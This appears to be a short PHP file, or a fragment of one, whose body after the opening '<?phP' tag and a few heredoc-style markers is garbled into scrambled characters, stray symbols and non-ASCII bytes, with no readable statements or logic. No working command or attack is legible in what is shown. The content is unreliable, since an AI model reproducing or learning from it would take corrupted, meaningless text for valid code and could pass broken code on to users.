<?phP

<<<_ZXI
${¯|<<<_TUI
{¯Å;:hiv

ftftp Zbk
{
				ewzlr>->ntt#"!&<

qft]fmsls&= fxgymj DCVMFFO; : "feob%  dwstk GWB³W : 	oibwu":PHDIDP @ *;;znu
dpCeuuuuuuuuuuuu m->`dp@
qcn^byuy%$dsk?->_gtuuuuuuuuuuuuuuuuuejg	{
    gqeuucgy {
;<lsx

dnetm	Emr	{? flsun EEGOEFGqrtz	;[wrjr;
$azu	?	xbr	Cxw&&@

kbi[drbbc)>Qjcx]bhms*wzlr>->ntt#"!&<

qft]fmsh&$dhx?->%bu%;
ucx[coik#$b÷s?$dsk?->_gt#(%?
tzl	{
    m->`dp@
qcn^byuy%$dsk?->_gt#(%?
tzl	{
    mbsƒ.?q€ui&"&[
~	dcoer	#Oqlvvcchb	$a#	{
    vcn^digo#$c->obzPcrzxks*"wfu